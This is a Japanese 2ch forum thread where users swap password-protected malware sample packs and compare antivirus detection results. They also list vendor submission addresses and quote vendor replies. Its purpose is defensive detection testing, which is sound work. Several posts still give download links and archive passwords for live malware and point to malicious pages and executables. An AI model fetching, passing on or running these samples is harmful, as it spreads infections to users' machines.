【鑑定目的禁止】検出可否報告スレ7

�@はじめに
各ウイルス対策ソフトの検出可否を独自に調査し報告するスレです。
IDが無いため検出結果を張る際はSSを必ず張ってください。
うｐろだはなるべく流れにくいところにしましょう。
特定のウイルス対策ソフトを擁護、非難する書き込みはやめましょう

前スレ
【鑑定目的禁止】検出可否報告スレ6
http://pc11.2ch.net/test/read.cgi/sec/1205329452/

�A報告用テンプレ
【検体サンプル】>>(検体URLのレス番号)
【ソフト名】
【結果】
【SS】http://

スクリーンショットの貼り付けは任意です。

専用アプロダ推奨↓
http://tane.sakuratan.com/

旧アップローダー（仕様変更で使えなくなったぽいorz)
ttp://www5.uploader.jp/home/tane/

�B議論や意見のまとめ

・圧縮ファイルと検出数
　exeの中身を検査数に入れるソフト、入れないソフトがあります。ご注意を。

・DOSウイルス禁止
　大昔のウイルスを集めてきても無意味なことがあります。

・パスなしZIPをパス有りLZH(またはRAR)で
　安全性と利便性のため、上記の手法を推奨します。

・淡々とやれ淡々と！
　淡々と貼り、淡々といきましょう。

・ブラクラ禁止
　ブラクラ等、想定しないものを無言で貼らないこと

・ここは検出力調査スレなんだから時間の経った報告は、同時点での検出結果比較の対象にならない
　んなこたーない。時間が経過したときにどれだけ対応数が増えているかも重要。
　という意見もあり。

・スレ違いでもめる(2スレ目以降)

・あらしはスルー。ソフトの優劣の議論は別スレで！

【重要】
●ここは鑑定スレではありません。malwareのみお願いします。
割れ厨やネトゲチート厨がここで鑑定させようとすることがありますが、スルーしてください。

●また、このスレは、検出の結果報告およびベンダーへの連絡を通じて、セキュリティの向上
に微力ながら貢献することを目的としているスレです。
検体の悪用・不正利用は厳禁願います。

●検体は、セキュリティ上の観点からなるべく >>1のアップローダを使用してください。

●検体確認は自己責任でお願いします。感染しても責任はもてません！

※◆W32/Vael.oは信頼できるコテさんです。

●新種・亜種ウイルスを発見した場合のサンプル提出先
(未検出の場合はとにかく提出しましょう)

シマンテック （ノートン）
Symantec Security Response USA 〔Upload a suspected infected file〕
ttps://submit.symantec.com/websubmit/retail.cgi

ウイルスバスター（トレンドマイクロ）　
http://inet.trendmicro.co.jp/esolution/supform.asp
バスターユーザー以外は
;http://www.trendmicro.com/jp/security/virushunter.htm
http://subwiz.trendmicro.com/SubWiz/Wizard.asp?opgWizard=7

マカフィー　
http://www.nai.com/japan/security/contactavert.asp

ウイルスセキュリティ(K7Computing)　
http://k7computing.com/faq.htm

ESET　NOD32アンチウイルス　
http://www.eset.com/support/ans/9d.htm

V3ウイルスブロック　
http://info.ahnlab.com/customer/virus_call.html

ウイルスドクター　
http://www.virusdoctor.jp/virus/

Rising（ウイルスキラー）
http://up.rising.com.cn/webmail/uploadnew.htm
Rising（ウイルスキラー）英語版
ttp://sample.rising-global.com/webmail/upload_en.htm


Dr.WEB　
http://drweb.jp/support/?virus_sample

ソフォス（Sophos)　
http://www.sophos.co.jp/support/queries/#sample

F-Secure　
http://www.f-secure.co.jp/support/samples/

kaspersky（カスペルスキー）
http://www.kaspersky.co.jp/
一番下の「新しいウイルスをお知らせ下さい」

バイロボット(hauri)
http://www.haurijapan.com/support/vreport01.php

キングソフトアンチウィルス
http://www.kingsoft.jp/support/is/kentai.htm

BitDefender　
http://www.bitdefender.com/bd/site/contactus.php

Avira AntiVir
ttp://www.avira.com/en/support/submit_suspicious_files.html

ewido(AVG;Anti ;Spyware)　
http://www.ewido.net/en/malware/

AVG　
http://www.grisoft.cz/doc/faq/jp/crp/0
http://www.grisoft.cz/doc/51/jp/crp/0/num/486#faq_486

avast!　
http://www.avast.com/jpn/technical_support.html

eTrust　
http://www.caj.co.jp/support/csp/free_policy/virus.htm

F-PROT;
http://www.f-prot.com/virusinfo/submission_form.html

esafe　
http://www.aladdin.com/home/csrt/vsubmit.asp

a2(a-squared)
http://www.emsisoft.jp/jp/support/submit/

Microsoft（マイクロソフト）
ttp://www.microsoft.com/security/portal/submit.aspx

ウイルスセキュリティ(K7Computing)　http://k7computing.com/virus_issues.asp#3

ウイルスチェイサー　http://www.viruschaser.jp/support_aft.html#q28

ーーーーーーーーーーーーーーーーーーーここまでーーーーーーーーーーーーーーーーーー

>>4->>7の検体提出先の変更・追加あれば、指摘よろ。

>>1乙　保守

>>１乙

おつ

>>1乙

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=42
Malware-Pack35

>>12　乙です。検出外はAVGに送りました。

>>12乙
ｽﾏﾝﾃｯｸに贈りました

バスターに検体提出するときみんなどうやって送ってるの？
まさか郵送なわけないと思うしバスターに送る人はバスターのシリアルナンバー持ってるの？

ところでavast!のチェストからの検体提出機能は便利だね、ここからコメントなしで提出しても対応してくれた。
ESETもせっかくファイル提出機能あるんだから解析チームしっかりしろよ、しかもavast!より簡単に検体提出できるのにこれじゃ宝の持ち腐れじゃねーか！！

>>8
Kingsoft Internet Security
http://www.kingsoft.jp/is/kentai.html

>>12
マイクロソフト送りました
>>14ｗ

>>12

トン

カスペ2009　10/12

Detected riskware not-a-virus:FraudTool.Win32.AntiSpySpider.ap Malware/2/antispyspider.msi
Detected riskware not-a-virus:FraudTool.Win32.MalwareProtector.a Malware/5
Detected riskware not-a-virus:FraudTool.Win32.DoctorAntivirus.a Malware/b
Detected Trojan program Backdoor.Win32.VB.dvu Malware/3/Postal-Siempresonrie.exe
Detected Trojan program Backdoor.Win32.IRCBot.djv Malware/4/mixit.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.bio Malware/6/setup_1_506_.exe
Detected Trojan program Trojan-Downloader.Win32.Zlob.qri Malware/7/MediaTubeCodec_ver1.446.0.exe
Detected Trojan program Trojan-Spy.Win32.Zbot.crv Malware/8/iiowk.exe
Detected Trojan program Heur.Downloader Malware/a/alteracao.com （ヒューリスティック）
Detected virus Rootkit.Win32.Clbd.cv Malware/9/file.exe

検体提出しました。

カスペからの返事

Hello,

4561.swf - Trojan-Downloader.SWF.Small.cr,
4562.swf - Trojan-Downloader.SWF.Small.cs,
alteracao.com_ - Trojan-Downloader.Win32.Banload.qtk

New malicious software was found in these files.
Detection will be included in the next update. Thank you for your help.

http://www.crazyclits.com/?cgi-bin/tm3/120178036.zip

K7 Total Security 9.0

7/12

0,1,2,3,5残り

>>20
avast!

VBS:Malware-gen

>>20
AVG　Internetsecurity8.0のWebシールドとサーフシールドが反応しまくり。

こないだPandaに初めて検体提出したけど一日で対応してくれた。
あまりの対応の速さに驚いたけどPandaってこんなに対応速いの？
でもスルーしてるウイルス多いし第三者機関でもテスト結果がしょぼいか参加しないことばかり。
Pandaってわけわからん。

初回ってとこがポイントかも知れん

最近、Symantecも日本時間が対応速くなってる

Symantecもやる気出さないとAntiVir、カスペ、AVG、Bitに置いてけぼりにされるからな。
マカフィーの復活はないのかな・・・
あそこはESET並みに酷い。

いやSymantecは中国シェアからして実力はあるよ
中国で米製がネームバリューで売れるわけないからね

>>20
まずは火狐３が反応して警告画面
あえて無視するとAvira反応
Contains recognition pattern of the HTML/Dldr.Age.48568 HTML script virus

>>20
http://www.virustotal.com/analisis/049036e1bd6d9a2e4d8b4558a7c44059

やられたorz

>>15
バスターは >>4 の下のほう。
ちなみにaspがエラーでコケたらそれは対応済み。

>>30
>>20自体がSQLインジェクションで改ざんされているということか？
できれば、>>1のあぷろだにあげてほしい。(´･ω･｀)ｼｮﾎﾞｰﾝ

>>32
ttp://www5.uploader.jp/dl/tane/tane_uljp00051.zip.html
解凍パス：infected
ＤＬパス：Virus

>>33
それは昔からある奴で、Windows Updateが最新なら感染しないよ?

flash経由で感染するものがでてるらしい。yourfilehostで感染者確認。

flashの脆弱性なら前からありますけど

陳腐化済

>>33
http://www.virustotal.com/jp/analisis/049036e1bd6d9a2e4d8b4558a7c44059

>>33
カスペ2009

Detected Trojan program Trojan-Clicker.HTML.IFrame.km tane_uljp00051.zip/crazyclits.htm

VTとは違うな。08/3/2作成検体

>>39
逆にマイクロソフトは無反応　何でだろう

とりあえず>>20の詳細
http://www.siteadvisor.com/sites/crazyclits.com?ref=safe&client_ver=FF_26.6_6270&locale=ja-JP&premium=false&client_type=FF&aff_id=0
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=http://www.crazyclits.com/?cgi-bin/tm3/120178036.zip

火狐３って結構優秀？
Trendプロテクト+Webレピュテーションと比較してみたいけどあいにくその環境が整ってないんだよな・・・

検体集めてたら感染したから画像上げと着ますね
http://tane.sakuratan.com/upload/src/tane0044.jpg

IEで検体集めは危険だからやめとけ

みんな検体集めするときは砂箱使ってるの？
こちらではAntiVirPremium＋Comodo＋FireFox3＋サイトアドバイザだけどこれじゃ頼りないかな？

感染PCから検体採取中。なかなかAVで反応しないのが手に入るからいいね。

http://blog20fc2.com/linelink/index.htm
ここにtestfileが多数うｐされてるよ。

>>46
火狐が怒ってるんですけど・・・

>>6
AVG　
http://www.grisoft.cz/doc/faq/jp/crp/0
http://www.grisoft.cz/doc/51/jp/crp/0/num/486#faq_486

AVGユーザーの方、
検体提出方法について教えて下さい

>>48
メールでいいんじゃね?
ttp://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

>>8
AVGはFAQのアドレスが変わってる
http://www.grisoft.com/jp.faq.num-771#faq_771

>>5訂正

Rising（ウイルスキラー）
http://up.rising.com.cn/webmail/uploadnew.htm
Rising（ウイルスキラー）英語版
ttp://sample.rising-global.com/webmail/upload_en.htm


Dr.WEB　
http://drweb.jp/support/?virus_sample

ソフォス（Sophos)　
http://www.sophos.co.jp/support/queries/#sample

F-Secure　
http://www.f-secure.co.jp/support/samples/

kaspersky（カスペルスキー）
http://www.kaspersky.co.jp/
一番下の「新しいウイルスをお知らせ下さい」

バイロボット(hauri)
http://www.haurijapan.com/support/vreport01.php

キングソフトアンチウィルス
http://www.kingsoft.jp/is/kentai.html

>>6訂正　>>50

BitDefender　
http://www.bitdefender.com/bd/site/contactus.php

Avira AntiVir
ttp://www.avira.com/en/support/submit_suspicious_files.html

ewido(AVG;Anti ;Spyware)　
http://www.ewido.net/en/malware/

AVG　
http://www.grisoft.cz/doc/faq/jp/crp/0
http://www.grisoft.com/jp.faq.num-771#faq_771

avast!　
http://www.avast.com/jpn/technical_support.html

eTrust　
http://www.caj.co.jp/support/csp/free_policy/virus.htm

F-PROT;
http://www.f-prot.com/virusinfo/submission_form.html

esafe　
http://www.aladdin.com/home/csrt/vsubmit.asp

a2(a-squared)
http://www.emsisoft.jp/jp/support/submit/

ブラクラを混ぜるな

ttp://turismosustentavelbrasil.org.br/index1.php

ttp://www.virustotal.com/analisis/d1cd055fcd28569487f3534d18a364c7

ベンダーが35に増えてなにがあるんだろうと思ったらバイロボットとPCToolsかよ。
この二つマジｲﾗﾈ

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=45
Malware-Pack36

>>55
出だしの挙動があやしくても､その後成長して定番の一角に認められるものもある
生暖かい目で見守ってやろうぜ

　　　　+ 。　*　　　ﾜｸﾜｸﾃｶﾃｶ　　+
ﾂﾔﾂﾔ　 ∧＿∧ 　+
　+ 　 _（u☆∀☆）　ｷﾞﾄｷﾞﾄﾇﾙﾇﾙ　　　　　　　　　　　バイロボット
　　⊂ （0ﾟ　∪ ∪。⊃ +　　　　　　　　　　　　　　　　 PCTools
⊂￣ﾟ と_u　_）__）ﾟ　￣⊃　+ ﾜｸﾜｸｷﾗｷﾗ
　 ⊂＿。+　　 ﾟ+＿⊃
　　　　⊂＿＿⊃. 　+ 　*　+　　　ﾜｸﾃｶ　　+

>>56
乙

カスぺ2009（12:05:00)
4/12

Detected riskware not-a-virus:Downloader.Win32.Antivirus2009.a Malware/1/AV2009Install_0011.exe
Detected Trojan program Trojan-Downloader.Win32.FraudLoad.vaod Malware/6/setup_525_18_.exe
Detected Trojan program Backdoor.Win32.Delf.jwh Malware/9/cliecker5.exe
Detected Trojan program Trojan-Downloader.Win32.Banload.rbc Malware/a/OiFotos_102772.exe

検体提出します。

>>56　AVG送付済み

>56
K7 Total Security 9.0
2/12

1 not-a-virus:Downloader.Win32.Antivirus2009.a
6 Trojan-Downloader.Win32.FraudLoad.vaod

>>56乙です
マイクロソフト未対応9個の検体送りました

>>56乙
NIS2008で5/12
未検出は贈っておきました

「勝手にウイルステスト」のサイトで紹介されたアドウェア
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=46
Pass:Adware

avast!、AVG、カスペには提出しました。

ちなみに64は火狐３でダウンロードしようとした弊害だったのかファイルが完全にダウンロードできなかったorz
一応AntiVirでスパイウェア反応するけど（当然フリーでは検出できない）

NOD32
ウイルス定義データベース: 3295 (20080724)

>56
　2/12+エラー1
Malware\0\AntiVirusInstallFree_en.exe - Win32/Adware.AVSystemCare アプリケーション
Malware\1\AV2009Install_0011.exe - Win32/Adware.XPAntivirus アプリケーション

Malware\7\AntivirusXP2008Installer.exe > NSIS > �ｧ�.exe - アーカイブの読み込み時にエラーが発生しました

>64
1/1
\unp161252899.tmp - Win32/Adware.180Solutions アプリケーション

ついでに
ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=43

5/8
080718\AdultChannel.exe - Win32/PSW.VB.QX トロイの木馬
080718\app.exe - Win32/Agentの亜種である可能性 トロイの木馬
080718\EroAnimePlayer.exe - Win32/PSW.VB.SJ トロイの木馬
080718\HyperErectCollection.exe - Win32/PSW.VB.RJ トロイの木馬
080718\MovieTubes.exe - Win32/PSW.VB.QY トロイの木馬

>>64
ttp://www.virustotal.com/analisis/8a62ccc8ef11915c0b8eee7bdff7f1b1

ウイルスバスター2008
>>56
Mal_Banker -> OiFotos_102772.exe

>>64
ADW_SEEKMO

検出しなかったものは提出

http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=47
dlﾊﾟｽ　　　　zipﾊﾟｽ
strange / malware

>>56
乙です
ClamWin Ver.0.93.1
2/12

\Malware\7\AntivirusXP2008Installer.exe: Trojan.Peed.IG FOUND
\Malware\a\OiFotos_102772.exe: Trojan.Banload.OSL FOUND

追加
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=48

ﾊﾟｽは上に同じ。
>>69は>>42の感染源のファイル(pdfﾌｧｲﾙ)とその他関連ﾌｧｲﾙとネットで集めたもの。
で、これはZlob系ので適当に関連ﾌｧｲﾙ詰め合わせ。(感染源のﾌｧｲﾙはsetup.exe)
http://www5.uploader.jp/user/tane/images/tane_uljp00053.jpg

>>64のカスペとAVGの返事
カスペ
Hello,

unp161252899.tmp_ - not-a-virus:WebToolbar.Win32.Zango.am

This file is already detected by our extended bases as a potentially risk program.

Please quote all when answering.


AVG

Dear Sir/Madam,

thank you for your email.

Unfortunately the password "virus" did not match for the archive.
Please send us the correct password or new archive with the infected file.

Thank you for your cooperation.

うん？AVGはパスワードが間違ってて解析できなかったのか？（英語力足りなくてｽﾏｿ）
でもカスペはしっかりと解析できてるし・・・（提出したファイルとパスは同じなんだけどな）

謎だ・・・

NOD32　ウイルス定義データベースのバージョン: 3298 (20080725)
47(>>69)
3/11
Virus47\288888.exe - Win32/PSW.Legendmir.SY トロイの木馬
Virus47\lphc3f8j0eaaa.exe - Win32/Adware.XPAntivirus アプリケーション
Virus47\mm.exe - Win32/Genetikの亜種である可能性 トロイの木馬

48(>>71)
14/16
C:\Documents and Settings\a\デスクトップ\48\ASCWarning32.dll - Win32/Adware.AntiSpyCheck アプリケーション
C:\Documents and Settings\a\デスクトップ\48\iebr.dll - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebt.dll - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebtm.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebtmm.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebtu.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\iebu.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\lla2.exe - Win32/TrojanDownloader.FakeAlert.EY トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\SetCertAcl.exe - Win32/Adware.NetPumper アプリケーション
C:\Documents and Settings\a\デスクトップ\48\setup.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\ubpr01.exe - Win32/BHO.NFX トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\wcm.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\wcs.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬
C:\Documents and Settings\a\デスクトップ\48\wcu.exe - Win32/TrojanDownloader.Zlob.CEO トロイの木馬

http://www1.axfc.net/uploader/He/so/123260
pass:abc

kaspersky7
7/25 18:01:51

>>69　　1/11
Trojan-Downloader.Win32.Agent.wbq ファイル: tane0047.zip/Virus/mm.exe//NSPack//#//PE_Patch//UPack

>>71　　4/16
Hoax.Win32.Renos.vapi ファイル: tane0048.zip/lla2.exe
not-a-virus:AdWare.Win32.E404.fv ファイル: tane0048.zip/ubpr01.exe//PE_Patch.UPX//UPX
not-a-virus:FraudTool.Win32.AntiSpyCheck.l ファイル: tane0048.zip/ASCWarning32.dll
Trojan-Downloader.Win32.Zlob.swn ファイル: tane0048.zip/setup.exe

Rising Antivirus 20.54.41
>>33>>56>>64>>71
スルー
>>12
スルーだったけど最近3だけ検出
Postal-Siempresonrie.exe: Backdoor.Win32.VB.eng
>>69
288888.exe: Trojan.DL.Win32.Small.djk
efds.html: Trojan.DL.VBS.Agent.coj
mm.exe>>nspack: Dropper.Win32.ExplorerDL.g

K7 Total Security 9.0

>69　2/11
Virus,288888.exe,Infected by Trojan-Downloader.Win32.Anskya.New,Cleaned ,
Virus,lphc3f8j0eaaa.exe,Infected by Trojan.Win32.Renos.ACB,Cleaned ,

>71　1/16
virus48,ASCWarning32.dll,Infected by not-a-virus:FraudTool.Win32.AntiSpyCheck.l,Cleaned ,

>74　5/5

ウイルスバスター2008
>>69
TROJ_Generic -> 288888.exe
Mal_Hifrm-2 -> letter.htm
TROJ_RENOS.ACB -> lphc3f8j0eaaa.exe

>>71
全スルー

検出しなかったものは提出しました

>>56,69,71
カスペからの返事仮まとめ

Hello,

123.htm_ - Trojan-Downloader.JS.Iframe.od,
efds.htm_ - Trojan-Downloader.JS.Agent.cjc,
letter.htm_ - Trojan-Clicker.HTML.IFrame.tr,
setup_1_1.exe_ - Trojan-Downloader.Win32.FraudLoad.vasd
lphc3f8j0eaaa.exe_ - Trojan-Downloader.Win32.Small.zge

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.

288888.exe_, class.ezpdf.php.exe_, locate.dll, msserv.config, nstaller.exe_, SetCertAcl.exe_, test.htm_, uxeSetup.exe_
AntiVirusInstallFree_en.exe ,0_engracado00.com,r0x.exe, ftp.exe

No malicious code were found in these files.

VRM_Free.exe_ - not-a-virus:FraudTool.Win32.VirusRemover.a

New potentially risk software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Evgeny Aseev
Virus analyst, Kaspersky Lab.

>>69,71
AVG提出しました。
>>74AVG全部撃破！

ttp://1st-tube.com/viewmovie.php

avast!とAVGは検出、AntiVirは検出しませんでした。

DLパス：malware
解凍：insukoman
ttp://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=50
>>42と同じ症状がでる感染元のファイル2つとZlob
両方ともMBAMで大方処理可能。

kaspersky AV7.0　
2008/7/31 3:56:36

17/29(31)

DLパス：virus
解凍：infected
http://tane.sakuratan.com/upload/upload.cgi?mode=dl&file=51

GrisoftとAviraには提出済です。

Rising Antivirus 20.55.32
>>82
dflgh8jkd2q2.exe, xpupdate.exe: Worm.Mail.Win32.Zhelatin.wsw
get_flash_update.exe: Trojan.Win32.Undef.jzk
mrofinu27.exe>>upx_c: Trojan.DL.Win32.Mnless.ahw
vedxg6ame4.exe>>65: Trojan.Win32.Undef.jro
vedxga3me2.exe: Trojan.Win32.Undef.jqt
>>81>>84
スルー

残りはRisingに提出済み

�d
カスペ2009 21:07:00

>>81
24個
Detected Trojan program Trojan.Win32.Buzus.ocu tane0050\kentai\geehnkkp.exe
Detected Trojan program Trojan-Downloader.Win32.Exchanger.hk tane0050\kentai\get_flash_update.exe
Detected Trojan program Trojan-Downloader.Win32.Homles.bz tane0050\kentai\mrofinu27.exe
Detected Trojan program Trojan-Downloader.Win32.BHO.oo tane0050\kentai\nod32.dll
Detected Trojan program Trojan.Win32.Shutdowner.em tane0050\kentai\rsyncini.exe
Detected Trojan program Trojan-Proxy.Win32.Small.uh tane0050\kentai\services.exe
Detected Trojan program Trojan.Win32.Pakes.jxx tane0050\kentai\setup_10054_509_.exe
Detected Trojan program Trojan-Downloader.Win32.Tibs.kkk tane0050\kentai\vedxg6ame4.exe
Detected Trojan program Trojan-Downloader.Win32.Agent.wlz tane0050\kentai\vedxga3me2.exe
Detected Trojan program Trojan-Downloader.Win32.Tibs.kkj tane0050\kentai\vedxga4m1et4.exe
Detected Trojan program Trojan-Downloader.Win32.Tibs.kkj tane0050\kentai\vedxga4me1.exe
Detected Trojan program Trojan-Downloader.Win32.Mutant.aim tane0050\kentai\Winls74.sys
Detected Trojan program Trojan.Win32.Pakes.jwi tane0050\kentai\wpx26.cpx
Detected virus Email-Worm.Win32.Zhelatin.afj tane0050\kentai\glok+7836-655e.sys
Detected virus Email-Worm.Win32.Zhelatin.afg tane0050\kentai\vedxg4am1et2.exe

以下、パッカー検知
Detected Trojan program Packed.Win32.Tibs.kn
dflgh8jkd2q1.exe,dflgh8jkd2q2.exe,dflgh8jkd2q5.exe,dflgh8jkd2q6.exe
dflgh8jkd2q7.exe, sysohqt.exe ,syswafb.exe ,xpupdate.exe ,vedxga1me4t1.exe


>>84
スルー

検体提出します。

K7 Total Security 9.0
>>82
6/29

>>84
0/2

McAfee
>>82
9個検出

>>84
1個検出

やはりK7は格が違った

ウイルスバスター2008
>>82
JS_SILLY.IS -> 1.htm
WORM_NUCRP.GEN -> asc3550p.sys
TROJ_NUWAR.DDJ -> back.exe.exe
TROJ_RENOS.ADE -> dflgh8jkd2q2.exe
TROJ_EXCHANGER.U -> get_flash_update.exe
TROJ_DLOADER.PER -> mrofinu27.exe
TROJ_SHUTDOWN.AN -> rsyncini.exe
TROJ_NUWAR.DDJ -> vedxg4am1et2.exe
TROJ_DROPPER.IBT -> vedxg6ame4.exe
TROJ_DLOADER.SVL -> vedxga3me2.exe
TROJ_PAKES.ATE -> wpx26.cpx
TROJ_RENOS.ADE -> xpupdate.exe

>>84
スルー
検出しなかったものは検体として提出

VirusTotalにソースネクストウイルスセキュリティ降臨!!
その恐るべき(低い)実力がついに晒される…

VirusTotal += K7 Including the engine from K7 Computing
ttp://blog.hispasec.com/virustotal/34

K7AntiVirus の行だな

>>92
なんという羞恥プレイ・・・ｺﾞｸﾘ

●hnLabあたりといい勝負しそうだ

恥を忍ぶのと引き換えに、検体情報がもらえるわけで
どうなっていくかな

なんだかんだで、優秀になってくれれば言うことないわけで
量販店いくたび、あれがあの価格のまま、もっと賢くなってくれればと思いつつ横目にいつも見てる

>>95
ネトゲトロイがそれなりに集まるAhnLabとじゃ勝負にならんでしょ。
ウイルスプロテクター(Hauri ViRobot)と底辺争いかと。

キングとかもいるVirSCANならともかく
いきなりVTデビューはきっついな…

せいぜいもらえるのは統計情報ていど

>>96
PCTools、Hauriを見てると今後期待できると思えないけどな。
ま、こいつらもつい最近参戦したばかりだが。

>>97
TrendMicroも意外と優秀だったしな。
だけどAV-Testの最新結果でバスターはK7より悪い結果だったという不思議。
そうなるとVirusTotalでK7は健闘するはずだけど・・・

>>84
av2009.exeはSymantecとTrendMicro対応。
このスレのちょっと前にNortonは対応が少し速くなった？とのレスがあったけど案外そうかもしれない。

しかしNOD32の対応の遅さは変わらず。

ttp://www.tane.sakuratan.com/upload/upload.cgi?mode=dl&file=52
Malware-Pack37

>>102乙
NIS2008で5/12 （1、5、7、8、a）
未検出は贈っておきました

Rising Antivirus 20.55.50
>>102
8\torpedo.scr: Trojan.Win32.Xcomp.a

>>102

kaspersky AV7.0
3/12

トロイの木馬 Trojan-Downloader.Win32.Delf.k tutane0052.zip/Malware/4/i.exe
リスクウェア not-a-virus:FraudTool.Win32.SecureExpertCleaner.a tane0052.zip/Malware/5/CleanerInstaller.exe//PE_Patch.UPX//UPX
トロイの木馬 Trojan-Downloader.Win32.Banload.rsr tane0052.zip/Malware/8/torpedo.scr//XComp

>102
K7 Total Security 9.0
3/12

Malware\4,i.exe,Infected by Trojan-Downloader.Win32.Delf.ktu,Cleaned ,
Malware\8,torpedo.scr,Infected By Trojan-Downloader.Win32.Banload.rsr ,Cleaned ,
Malware\9,kil.exe,Infected by Backdoor.Win32.SDBOT.GAV,Cleaned ,

K7とKAVが同率でﾜﾛｽ

>102
NOD32 3318 (20080801)
4つだけど全部ヒューリスティック

0\kil.exe - Win32/Packed.Themidaの亜種である可能性 アプリケーション
8\torpedo.scr - 新種・未知のNewHeur_PEである可能性 ウイルス
9\kil.exe - Win32/Packed.Themidaの亜種 アプリケーション
a\fotos.exe - 新種・未知のNewHeur_PEである可能性 ウイルス

例外
6\Nero-6.6.0.16.exe > RAR > Common Files\DSFilters\NeAudio.ax - アーカイブが破損しています

>>102
F-Secure Internet Security2008

ファイル C:\Documents and Settings\デスクトップ\Malware\4\i.exe に不正なコードを検知しました。
感染: Trojan-Downloader.Win32.Delf.ktu
処理: ファイルを削除しました。
ファイル C:\Documents and Settings\デスクトップ\Malware\8\torpedo.scr に不正なコードを検知しました。
感染: Trojan-Downloader.Win32.Banload.rsr
処理: ファイルを削除しました。
ファイル C:\Documents and Settings\デスクトップ\Malware\9\kil.exe に不正なコードを検知しました。
感染: Trojan:W32/Delf.DOL
処理: ファイルを削除しました。

5もリスクウェアとして検知・・・削除できた

セキュリティ初心者質問すれより、各自ベンダーへの提出よろしく
270 名前：267[sage] 投稿日：2008/08/02(土) 20:59:42
フリーのようなので、どちらかを入れることにします。
そのスレの住人に、パソコン再起動して、起動したらセーフ　起動しなかったらアウトと言われました。
とりあえず再起動してきます。
アドレスを一応載せますが、自己責任でお願いします。
read me　のとおりの手順で起動して行き、d3なんちゃらというファイルを起動したところで表示されました。
危険なので、ダウンロードされる際は自己責任という形でお願いします。。。
ttp://www3.uploader.jp/home/blackrx/　これのNo27です。
問題のスレがこちら。
http://game13.2ch.net/test/read.cgi/mmosaloon/1214747996/601-700

現在対応してるAV
AntiVir：DR/BAT.Shutdown.AB.2
AVG：KillFiles.EU
Bit：MemScan:Trojan.Agent.AIXL
DrWeb：MULDROP.Trojan
イカ：Trojan.Win32.KillAV.ko
パンダ：Trj/Dropper.WF
VBA：Trojan.Win32.KillAV.ko

ttp://i37.tinypic.com/2r59ht1.jpg

このスレ的に検出性能と検体対応速度が絶望的なのはマカフィーとNOD32で決定みたいだな。
バスターはそこそこだしNortonとavast!は以前より良くなった、BitDefenderは一時期不調だったけど最近は復調傾向。

とりあえず↓のベンダーで２〜３以上のベンダーが検出すればウイルスで間違いないかと。

AntiVir
avast!
AVG
BitDefender
F-Secure
Kaspersky
Symantec
Trend Micro

>>112
あますぎる

>>110
カスペ　Trojan.Win32.KillWin.cw

>>102
トレンド フレックス セキュリティ : オンラインスキャン
Mal_Banker Virus 0\kil.exe
TROJ_FRAUDLOA.TT Trojan 3\virusremover.dll
WORM_SDBOT.GAV Trojan 9\kil.exe

最近のまとめ
注）投稿日時が遅いほうが有利なので参考データ

投稿日時　検出数 アンチウイルス

>>82 (29個)　[31(木) 14:40:56]
[31(木) 21:21:47]　17　kaspersky AV7.0(3:56:36)
[31(木) 22:01:27]　05　Rising Antivirus 20.55.32
[31(木) 23:00:25]　24　kaspersky 2009 (21:07:00)
[31(木) 23:56:52]　06　K7 Total Security 9.0
[01(金) 14:41:09] 　09　McAfee
[01(金) 16:41:37]　12　ウイルスバスター2008

>>84 (2個)　[31(木) 21:30:04]
[31(木) 22:01:27]　0　Rising Antivirus 20.55.32
[31(木) 23:00:25]　0　カスペ2009 (21:07:00)
[31(木) 23:56:52]　0　K7 Total Security 9.0
[01(金) 14:41:09] 　1　McAfee
[01(金) 16:41:37]　0　ウイルスバスター2008

>>102 (12個)　[02(土) 14:26:55]
[02(土) 15:21:34]　4　NIS2008
[02(土) 16:35:02]　1　Rising Antivirus 20.55.50
[02(土) 17:09:16]　3　kaspersky AV7.0
[02(土) 17:22:30]　3　K7 Total Security 9.0
[02(土) 17:45:29]　4　NOD32 3318 (20080801)
[02(土) 17:47:06]　4　F-Secure Internet Security2008
[03(日) 02:11:41]　3　ウイルスバスター

>>102 (12個)　[02(土) 14:26:55]
[02(土) 15:21:34]　5　NIS2008
[02(土) 16:35:02]　1　Rising Antivirus 20.55.50
[02(土) 17:09:16]　3　kaspersky AV7.0
[02(土) 17:22:30]　3　K7 Total Security 9.0
[02(土) 17:45:29]　4　NOD32 3318 (20080801)
[02(土) 17:47:06]　4　F-Secure Internet Security2008
[03(日) 02:11:41]　3　ウイルスバスター

ウイルスバスターは土日のパターン更新ないけど

http://virus-factory.tv/dangerous-virus/danger-rankSSS/pc-destroyer.exe

カスペからの返事 >>82、>>84

Hello,

1.htmk - Trojan-Downloader.JS.Agent.cke,
asc3550p.sys - Trojan.Win32.Pakes.jyz

New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.（新種ファイル発見）

av2009.exek - Trojan-Downloader.Win32.FraudLoad.vatr,
back.exe.exek - Email-Worm.Win32.Zhelatin.afy,
